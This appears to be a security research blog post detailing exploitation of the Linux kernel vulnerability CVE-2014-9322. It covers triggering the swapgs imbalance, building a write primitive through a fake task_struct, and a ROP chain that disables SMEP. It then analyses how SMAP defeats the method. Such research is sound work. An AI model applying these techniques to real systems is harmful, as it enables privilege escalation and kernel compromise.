
Quoting SDM:
“SWAPGS exchanges the current GS base register value with the value contained
in MSR address C0000102H
(IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction
intended for use by system software. (…) The kernel can then use the GS prefix on
normal memory references to access [per-cpu]kernel data structures.”
For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is:

  1. swapgs (now the gs base points to kernel memory)
  2. access per-cpu kernel data structures via memory instructions with gs prefix
  3. swapgs (it undos the result of the previous swapgs, gs base points to usermode memory)
  4. return to usermode

Naturally, kernel code must ensure that whenever it wants to access percpu data with gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is noneven (so that gs base points to kernel memory).

Triggering the vulnerability

By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, kernel will try to access important data structures with a wrong gs base, controllable by the user.
When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says:

 64-Bit Mode Exceptions:
 If an attempt to pop a value off the stack violates the SS limit.
 If an attempt to pop a value off the stack causes a non-canonical address
 to be referenced.

None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

IF stack segment is not present
THEN #SS(SS selector); FI;

So, in usermode, we need to set ss register to something not present. It is not straighforward: we cannot just use

mov $nonpresent_segment_selector, %eax
mov %ax, %ss

as the latter instruction will generate #GP. Setting the ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64bits system (it might work on 32bit, though). The solution is:

  1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
  2. thread B: ss:=X_selector
  3. thread A: invalidate X via sys_modify_ldt
  4. thread B: wait for hardware interrupt

The reason why one needs two threads (both in the same process) is that the return from the syscall (including sys_modify_ldt) is done via sysret instruction that hardcodes the ss value. If we invalidated X in the same thread that did “ss:=X instruction”, ss would be undone.
Running the above code results in kernel panic. In order to do something more meaningful, we will need to control usermode gs base; it can be set via arch_prctl(ARCH_SET_GS) syscall.

Achieving write primitive

If we run the above code, then #SS handler runs fine (meaning: it will not touch memory at gs base), returns into bad_iret, that in turn jumps to #GP exception handler. This runs fine for a while, and then calls the following function:

289 dotraplinkage void
290 do_general_protection(struct pt_regs *regs, long error_code)
291 {
292         struct task_struct *tsk;
306         tsk = current;
307         if (!user_mode(regs)) {
                ... it is not reached
317         }
319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;
322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
323                         printk_ratelimit()) {
324                 pr_info("%s[%d] general protection ip:%lx sp:%lx
325                         tsk->comm, task_pid_nr(tsk),
326                         regs->ip, regs->sp, error_code);
327                 print_vma_addr(" in ", regs->ip);
328                 pr_cont("\n");
329         }
331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
332 exit:
333         exception_exit(prev_state);
334 }

It is far from obvious from the C code, but the assignment to tsk from current macro uses memory read with gs prefix. Line 306 is actually:

0xffffffff8164b79d :	mov    %gs:0xc780,%rbx

This gets interesting. We control the “current” pointer, that points to the giant data structure describing the whole Linux process. Particularly, the lines

319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;

are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are 0 and 0xd constants, respectively), but this should not be a problem. Game over ?

Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

  1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
  2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code)
  3. trigger the vulnerability

Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. unhandled_signal() function dereferences a pointer from task_struct. We have no control what lies beyond X, and the result will be a page fault in kernel.
How can we cope with this? Options:

  1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).
    This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.

  2. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.
    This does not work, either, for two reasons:

    • Linux makes IDT read-only (bravo!)
    • even if IDT was writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDS of IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being an useful stack pivot sequence are negligible.
  3. We can try a race. Say, “tsk->thread.error_code = error_code” write facilitates code
    execution, e.g. allows to control code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.
    I tried this approach a couple of times, with no luck; perhaps with different vulnerability the timings would be different and it would work better.

  4. Throw a towel on “tsk->thread.error_code = error_code” write.

With some disgust, we will follow the last option. We will point “current” to usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

Achieving write primitive continued, aka life after do_general_protection

Our next chance is the function called by do_general_protection():

force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
        unsigned long int flags;
        int ret, blocked, ignored;
        struct k_sigaction *action;

        spin_lock_irqsave(&t->sighand->siglock, flags);
        action = &t->sighand->action[sig-1];
        ignored = action->sa.sa_handler == SIG_IGN;
        blocked = sigismember(&t->blocked, sig);   
        if (blocked || ignored) {
                action->sa.sa_handler = SIG_DFL;
                if (blocked) {
                        sigdelset(&t->blocked, sig);
        if (action->sa.sa_handler == SIG_DFL)
                t->signal->flags &= ~SIGNAL_UNKILLABLE;
        ret = specific_send_sig_info(sig, info, t);
        spin_unlock_irqrestore(&t->sighand->siglock, flags);

        return ret;

The field “sighand” in task_struct is a pointer, that we can set to an arbitrary value. It means that the

action = &t->sighand->action[sig-1];
action->sa.sa_handler = SIG_DFL;

lines are another chance for write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0.
This finally works, hurray ! with a little twist. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is a line

spin_lock_irqsave(&t->sighand->siglock, flags);

As t->sighand->siglock is at constant offset from t->sighand->action[sig-1].sa.sa_handler, it means kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then?
There are two possibilities:

  1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
  2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.
    This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following:

    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.

A careful reader is encouraged to enquire why cannot use the latter approach in the case X+SPINLOCK is initially unlocked.
This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because still the usermode ss value on the stack refers to a nonpresent segment). But this time, the extra swapgs instruction in #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.


Digression: SMEP

SMEP is a feature of Intel processors, starting from 3rd generation of Core processor. If the SMEP bit is set in CR4, CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

Achieving code execution

The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?
Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to an useful stack pivot sequence are low.
What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite top bytes of P so that the resulting address is in usermode, and P->code_pointer_in_x() call will jump to a location that we can choose.
I am not sure what is the best object to attack. For my experiments, I choose the kernel proc_root variable. It is a structure of type

struct proc_dir_entry {
        const struct inode_operations *proc_iops;
        const struct file_operations *proc_fops;
        struct proc_dir_entry *next, *parent, *subdir;
        u8 namelen;
        char name[];

This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

struct inode_operations {
        struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
        void * (*follow_link) (struct dentry *, struct nameidata *);
        ...many more...
        int (*update_time)(struct inode *, struct timespec *, int);
} ____cacheline_aligned;

proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT.
So, we will ovewrite proc_root.subdir so that it becomes a pointer to a controlled struct
proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

  1. map 16MB of memory at address 4096
  2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to usermode address FAKE_IOPS, and name field being “A” string.
  3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir

Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info() proc_root.subdir will point to controlled usermode memory. When our process will call open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?
If you think the answer is “to our shellcode”, go back and read again.

We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes the knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in case of the tested kernel), works very well for 64bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32bit registers, thus clearing the high 32bits of %rsp, and landing %rsp in usermode memory. At the worst case, we may need to allocate low 4GB of virtual memory and fill it with rop chain.
In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

  1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
  2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers.
In the second case, the %rsp will be assigned the low 32bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well.
To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses.
The ROP chain itself is straightforward, shown for the second case:

unsigned long *stack=0x8119f1ed;
*stack++=0xffffffff81307bcdULL;  // pop rdi, ret
*stack++=0x407e0;                //cr4 with smep bit cleared
*stack++=0xffffffff8104c394ULL;  // mov rdi, cr4; pop %rbp; ret
*stack++=0xaabbccdd;             // placeholder for rbp


Digression: SMAP

SMAP is a feature of Intel processors, starting from 5th generation of Core processor. If the SMAP bit is set in CR4, CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on an a system with Core-M 5Y10a CPU) that tries to access usermode crashes with:

[  314.099024] running with cr4=0x3407e0
[  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
[  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
[  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
[  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

As we can see, although the usermode page is present, access to it throws a page fault.
Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (that was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in case of Linux, access to usermode is performed explicitely, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in the exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP.

SMAP to the rescue!

The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode.
What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

write(pipe_filedescriptor, evil_data, ...

then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.
However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel:

long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
         int ret = 0; 
         int doit = task == current;
         int cpu;
         switch (code) { 
         case ARCH_SET_GS:
                 if (addr >= TASK_SIZE_OF(task))
                         return -EPERM; 
                 ... honour the request otherwise

Houston, we have a problem – we cannot use this API to set gs base above the end of usermode memory !
Recent CPUs feature wrgsbase instruction, that sets the gs base directly. This is a nonprivileged instruction, but needs to be enabled by the kernel by setting the FSGSBASE bit (no 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

On 64bits, nonsystem entries in GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with base address in kernel space.
So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.


Get every new post delivered to your Inbox.

Join 10,474 other followers